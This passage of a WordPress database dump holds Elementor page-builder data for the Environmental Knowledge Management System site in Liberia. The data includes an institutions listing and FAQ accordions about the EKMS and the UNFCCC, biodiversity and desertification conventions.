fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(16967,2538,'_elementor_version','2.7.5'),(16968,2538,'_elementor_template_type','wp-page'),(16969,2538,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(17019,2548,'_elementor_edit_mode','builder'),(17020,2548,'_elementor_template_type','wp-page'),(17021,2548,'_elementor_version','2.7.5'),(17022,2548,'_wp_page_template','default'),(17023,2548,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"institution\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"institutions_category\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"box_bg\":\"rgba(0,100,0,0.74)\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"#61ce70\",\"box_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_color_hover\":\"#014421\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"show_terms\":\"yes\",\"slides_to_scroll\":\"4\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"terms_link_typography_font_weight\":\"400\",\"terms_link_bg_color\":\"rgba(110,193,228,0.72)\",\"terms_link_color\":\"#000000\",\"terms_link_hover_bg_color\":\"#006400\",\"terms_link_hover_color\":\"#ffffff\",\"thumb_size\":\"full\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(17027,2549,'_elementor_controls_usage','a:0:{}'),(17028,2549,'_ca_post_type','institution'),(17030,2550,'_wp_page_template','default'),(17031,2550,'_elementor_edit_mode','builder'),(17032,2550,'_elementor_template_type','wp-page'),(17033,2550,'_elementor_version','2.7.5'),(17034,2550,'_elementor_data','[{\"id\":\"81604c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"635073e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"20a0238\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"heading_color\":\"#196819\",\"color_text\":\"#000000\",\"color_link_hover\":\"#114511\"},\"elements\":[{\"id\":\"3b455ed\",\"elType\":\"widget\",\"settings\":{\"title\":\"GENERAL \",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c396810\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the EKMS?\",\"tab_content\":\"<p>The Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the Environmental Protection Agency (EPA), other\\u00a0 Government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education.<\\/p><p>It focuses on how the Rio conventions are being implemented in Liberia.<\\/p>\",\"_id\":\"eb92a21\"},{\"tab_title\":\"Who can contribute to the EKMS?\",\"tab_content\":\"<p>Government Institutions, International and National NGOs that have direct linkages with environmental policies and development, are invited to join the EKMS team. Interested individuals could also submit useful data to the EKMS. Please see our institutions resources to know which institutions are currently participating.<\\/p>\",\"_id\":\"044d49e\"},{\"tab_title\":\"How can i discussion on topics?\",\"tab_content\":\"<p>Join our community forum for free, if you are interested in discussing issues indepth. You can also share discussed topics with your own group on Facebook, Twitter, or Linkedin. Thank you for your interest in the EKMS.<\\/p>\",\"_id\":\"bc9c821\"},{\"tab_title\":\"How can i find knowledge resources on the EKMS?\",\"tab_content\":\"<p>Use the smart search feature on the homepage to search for keywords or better still select a category.<\\/p>\",\"_id\":\"39dd408\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49d848d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"396f528\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"30a8e68\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3d1091e\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNFCCC\",\"title_color\":\"#126b37\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2aefce2\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"When should I accredit myself for UNFCCC meetings?\",\"tab_content\":\"<p>Accreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.<\\/p>\",\"_id\":\"a4d8544\"},{\"tab_title\":\"I want to get graphs and data about climate change. What is available and can I use it?\",\"tab_content\":\"<p>All official texts, data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.<\\/p>\",\"_id\":\"3148a01\"},{\"tab_title\":\"Are UNFCCC meetings open to the general public?\",\"tab_content\":\"<p>No, each participant must be properly accredited and registered.<\\/p>\",\"_id\":\"872f5c5\"},{\"tab_title\":\"Who can participate in UNFCCC meetings and how do they accredit themselves?\",\"tab_content\":\"<p>There are different participation groups at UNFCCC meetings; these include:<\\/p><ol><li><p><strong>Government delegate<\\/strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and\\/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/parties_observers\\/parties\\/national_focal_points\\/items\\/9336.php\\\">National Focal Point<\\/a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.<\\/p><\\/li><li><p><strong>Observers<\\/strong>\\u00a0from admitted\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-ngos\\\" target=\\\"_self\\\">non-governmental<\\/a>\\u00a0or\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-igos\\\" target=\\\"_self\\\">intergovernmental<\\/a>\\u00a0organizations. Nominations must be made by the Designated Contact Points of admitted organizations using the\\u00a0<a href=\\\"https:\\/\\/onlinereg.unfccc.int\\/\\\">online registration system<\\/a>\\u00a0(ORS). Please see the\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/overview\\\" target=\\\"_self\\\">civil society<\\/a>\\u00a0web page for more information.<\\/p><\\/li><li><p><strong>Observer<\\/strong>\\u00a0from a United Nations organization or specialized agency. Nominations are received from the respective organization.<\\/p><\\/li><li><p><strong>Member of the press<\\/strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/press\\/calender_of_events\\/accreditation\\/items\\/2987.php\\\">accreditation section<\\/a>.<\\/p><\\/li><\\/ol>\",\"_id\":\"34ce7e2\"},{\"tab_title\":\"What is the purpose of the UNFCCC?\",\"tab_content\":\"<p>The\\u00a0UN Framework Convention on Climate Change\\u00a0(UNFCCC) is an intergovernmental treaty developed to address the problem of\\u00a0climate change.<\\/p>\",\"_id\":\"5364766\"},{\"tab_title\":\"What is climate neutrality?\",\"tab_content\":\"<p>Climate neutrality is achieved by balancing the amount of emissions generated with the Earth\'s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.<\\/p>\",\"_id\":\"2cf3095\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"034d9e3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f12a46\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"00a6661\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e527259\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCBD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e0f30fd\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the UNCBD?\",\"tab_content\":\"<p>The\\u00a0Convention on Biological Diversity\\u00a0(CBD)\\u00a0is\\u00a0an international legally-binding treaty with three main goals: conservation of\\u00a0biodiversity; sustainable use of\\u00a0biodiversity; fair and equitable sharing of the benefits arising from the use of genetic resources.<\\/p>\",\"_id\":\"76b731c\"},{\"tab_title\":\"What is conservation of biodiversity?\",\"tab_content\":\"<p>Conservation of biological diversity\\u00a0leads to\\u00a0conservation\\u00a0of essential ecological\\u00a0diversity\\u00a0to preserve the continuity of food chains. The genetic\\u00a0diversity\\u00a0of plants and animals is preserved. Biodiversity conservation\\u00a0serves as an insurance policy for the future.<\\/p>\",\"_id\":\"fc56846\"},{\"tab_title\":\"What is the need of conducting a biodiversity meet?\",\"tab_content\":\"<p>Biodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.<\\/p>\",\"_id\":\"1c0b9e0\"},{\"tab_title\":\"How can we protect and preserve biodiversity?\",\"tab_content\":\"<p>Support the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and\\u00a0protect\\u00a0beaches, parks, reserves, and fields where wild plants and animals live.<\\/p>\",\"_id\":\"b0638cd\"},{\"tab_title\":\"What are some factors that affect biodiversity?\",\"tab_content\":\"<p>The loss of\\u00a0biodiversity affects the lives of more than 1 billion people living in dry lands.<br \\/>5 major threats to biodiversity;<br \\/>Climate change<br \\/>Deforestation and habitat loss<br \\/>Over-exploitation<br \\/>Invasive species<br \\/>Pollution<\\/p>\",\"_id\":\"45db245\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e9a9393\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f33106f\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"81f02fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"971e22b\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCCD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fefb411\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the importance of the UNCCD?\",\"tab_content\":\"<p>The\\u00a0United Nations Convention to Combat Desertification\\u00a0in Those\\u00a0Countries\\u00a0Experiencing Serious Drought and\\/or\\u00a0Desertification, Particularly in Africa (UNCCD) is a\\u00a0Convention to combat desertification\\u00a0and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by\\u00a0<span style=\\\"color: #222222; font-family: georgia, palatino, serif; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;\\\">international cooperation and partnership arrangements.<\\/span><\\/p>\",\"_id\":\"9661246\"},{\"tab_title\":\"Is the UNCCD legally binding?\",\"tab_content\":\"<p>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management<\\/p>\",\"_id\":\"da9b208\"},{\"tab_title\":\"What is desertification?\",\"tab_content\":\"<p>Desertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.<\\/p>\",\"_id\":\"c71b5f6\"},{\"tab_title\":\"Why is it important to combat desertification?\",\"tab_content\":\"<p>Desertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land\'s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined - are at risk of being displaced as a consequence of desertification.<\\/p>\",\"_id\":\"1275d06\"},{\"tab_title\":\"Is desertification a global problem?\",\"tab_content\":\"<p>Desertification is a worldwide problem directly affecting 250 million people and a third of the earth\'s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world\'s poorest in over one hundred countries are threatened.<\\/p>\",\"_id\":\"0f255fe\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false}]'),(17038,2551,'_wp_page_template','default'),(17039,2551,'_elementor_edit_mode','builder'),(17040,2551,'_elementor_template_type','wp-page'),(17041,2551,'_elementor_version','2.7.5'),(17042,2551,'_elementor_data','[{\"id\":\"81604c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"635073e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"20a0238\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"heading_color\":\"#196819\",\"color_text\":\"#000000\",\"color_link_hover\":\"#114511\"},\"elements\":[{\"id\":\"3b455ed\",\"elType\":\"widget\",\"settings\":{\"title\":\"GENERAL \",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c396810\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the EKMS?\",\"tab_content\":\"<p>The Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the Environmental Protection Agency (EPA), other\\u00a0 Government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education.<\\/p><p>It focuses on how the Rio conventions are being implemented in Liberia.<\\/p>\",\"_id\":\"eb92a21\"},{\"tab_title\":\"Who can contribute to the EKMS?\",\"tab_content\":\"<p>Government Institutions, International and National NGOs that have direct linkages with environmental policies and development, are invited to join the EKMS team. Interested individuals could also submit useful data to the EKMS. Please see our institutions resources to know which institutions are currently participating.<\\/p>\",\"_id\":\"044d49e\"},{\"tab_title\":\"How can i discuss on topics?\",\"tab_content\":\"<p>Join our community forum for free, if you are interested in discussing issues indepth. You can also share discussed topics with your own group on Facebook, Twitter, or Linkedin. Thank you for your interest in the EKMS.<\\/p>\",\"_id\":\"bc9c821\"},{\"tab_title\":\"How can i find knowledge resources on the EKMS?\",\"tab_content\":\"<p>Use the smart search feature on the homepage to search for keywords or better still select a category.<\\/p>\",\"_id\":\"39dd408\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49d848d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"396f528\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"30a8e68\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3d1091e\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNFCCC\",\"title_color\":\"#126b37\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2aefce2\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"When should I accredit myself for UNFCCC meetings?\",\"tab_content\":\"<p>Accreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.<\\/p>\",\"_id\":\"a4d8544\"},{\"tab_title\":\"I want to get graphs and data about climate change. What is available and can I use it?\",\"tab_content\":\"<p>All official texts, data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.<\\/p>\",\"_id\":\"3148a01\"},{\"tab_title\":\"Are UNFCCC meetings open to the general public?\",\"tab_content\":\"<p>No, each participant must be properly accredited and registered.<\\/p>\",\"_id\":\"872f5c5\"},{\"tab_title\":\"Who can participate in UNFCCC meetings and how do they accredit themselves?\",\"tab_content\":\"<p>There are different participation groups at UNFCCC meetings; these include:<\\/p><ol><li><p><strong>Government delegate<\\/strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and\\/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/parties_observers\\/parties\\/national_focal_points\\/items\\/9336.php\\\">National Focal Point<\\/a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.<\\/p><\\/li><li><p><strong>Observers<\\/strong>\\u00a0from admitted\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-ngos\\\" target=\\\"_self\\\">non-governmental<\\/a>\\u00a0or\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-igos\\\" target=\\\"_self\\\">intergovernmental<\\/a>\\u00a0organizations. Nominations must be made by the Designated Contact Points of admitted organizations using the\\u00a0<a href=\\\"https:\\/\\/onlinereg.unfccc.int\\/\\\">online registration system<\\/a>\\u00a0(ORS). Please see the\\u00a0<a 